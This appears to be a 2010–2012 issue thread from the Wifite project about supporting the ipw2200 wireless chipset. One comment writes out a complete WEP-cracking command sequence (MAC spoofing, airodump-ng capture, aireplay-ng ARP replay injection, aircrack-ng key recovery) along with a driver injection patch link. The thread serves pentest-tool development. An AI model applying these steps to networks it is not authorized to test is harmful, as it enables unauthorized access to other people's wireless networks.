Open GoogleCodeExporter opened 9 years ago
ipw2200 is different than other wireless cards. The "issue" you encountered is
not because of Wifite, but because of your hardware and drivers.
I have tried to add support for ipw2200 on GrimWepa and it was a huge waste of
my time. Backtrack4 does not work well with ipw2200. I am going to ask you
some questions now to save us both some time.
First (and biggest) question:
*Have you successfully injected packets and cracked a WEP key using the ipw2200
chipset on backtrack4 R1?*
If your answer is "no" or "I don't know" then wifite is not for you. Get
Backtrack2 and follow [http://forum.aircrack-ng.org/index.php?topic=1775.0 the
guide posted here]. Or you could buy one of the hundreds of other models of
wireless cards that are compatible with Backtrack 4. I will not help you any
further. Goodbye.
If your answer is "yes" then I need you to tell me *absolutely everything*
about the attack process. I want to know every command you type, and the
output for each command; no expections. Feel free to email this process to me:
"derv82 at gmail dot com" since emails are easier to write than comments.
Here's some questions to help guide your email:
Starting monitor mode:
1. How can you tell if you have the ipw2200 chipset? Does airmon-ng say
'ipw2200' or 'Intel 2200'? What is the name of the device (wlan0, rtap0)?
2. How do you put your device into monitor mode? Do you use airmon-ng,
iwconfig, or something else? Please tell me the exact commands issued.
3. What is the name of the device that is put into monitor mode (wlan1, mon0)?
What is the *entire* output for iwconfig after the device is in monitor mode?
4. Is there anything special you have to do before/after putting your card into
monitor mode? It would help if you posted *every command* that you type when
cracking WEP.
WEP attacks:
5. How you do fake-authenticate with the access point? Do you use "aireplay-ng
-1 ..." or "wpa_supplicant ..." ? What command do you use to fake-authenticate?
How do you know when you are associated with the access point?
6. What attacks work? I have heard that only "aireplay-ng -3 ..." (arp-request
replay) injects, and that the other WEP attacks fail. Is this true for your
card? Can you test injection using "aireplay-ng -9"? What does it say?
Clean-up:
7. Do you have to run any commands after the attack is complete? Do you put
your device out of monitor mode? Clean up at all?
Sorry for the block of text, but I refuse to type one line of code for ipw2200
support until I am certain that it works with Backtrack4.
If the workaround for ipw2200 is too complex or would break the flow of Wifite,
it will not be supported.
Original comment by der...@gmail.com
on 28 Sep 2010 at 6:39
Agreed: ipw2200 is a complete waste of time, too many people have played with
getting support working to end in frustration. Quicker and easier to just buy a
supported miniPCI/USB card...
Original comment by phillips321
on 1 Oct 2010 at 1:43
I had some time to waste and came up with the patch (sorry, I don't use
backtrack):
http://trac.pentoo.ch/browser/portage/trunk/net-wireless/compat-wireless/files/i
pw2200-inject.2.6.36.patch
Bellow are basic steps on how to use it:
modprobe ipw2200 rtap_iface=1
iwconfig eth1 essid TestWiFi channel 6 key s:fakekey mode managed
ifconfig eth1 up hw ether 00:11:22:33:44:55
ifconfig rtap0 up
airodump-ng eth1
- syslog: kernel: device rtap0 entered promiscuous mode
airodump-ng eth1 --channel 6 --bssid 00:01:MACofAP -w dumpfile
- find WAP protected access point and write down MAC address (MACofAP)
- notice MAC address of connected client (MACofCLIENT)
aireplay-ng --arpreplay -b 00:01:MACofAP -h 00:02:MACofCLIENT eth1
aircrack-ng -z -b 00:01:MACofAP dumpfile*.cap
- Opening dumpfile-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15298 ivs.
KEY FOUND! [ xxxxxx ]
Decrypted correctly: 100%
Feel free to test it and add to wifite.
ps. wifite can be found in pentoo trac too.
Original comment by blshkv
on 13 Dec 2010 at 7:08
great!
how can i test it? have I to download/install the patch or what else? a newer
release of wifite?
thank you in advance
Original comment by marco.ca...@gmail.com
on 13 Dec 2010 at 10:03
You need to patch/recompile/reload the ipw2200 kernel module, play around with
aircrack-ng as above (the arpreplay method). You are welcome to test other
methods (see aircrack-ng docs for details) and provide full answer to the
comment #2.
Let's hope it will convince developers to support ipw2200 card in the next
release.
Original comment by blshkv
on 13 Dec 2010 at 10:42
"You need to patch/recompile/reload the ipw2200 kernel module": ok. But how?
sorry for stupid question... perhaps it's a goal out of my reach...
thanks again
Original comment by marco.ca...@gmail.com
on 13 Dec 2010 at 11:06
https://code.google.com/p/pentoo/source/browse/portage/trunk/net-wireless/compat
-wireless/files/ipw2200-inject.3.4.6.patch
Original comment by blshkv
on 15 Aug 2012 at 10:17
Original issue reported on code.google.com by
marco.ca...@gmail.com
on 27 Sep 2010 at 11:32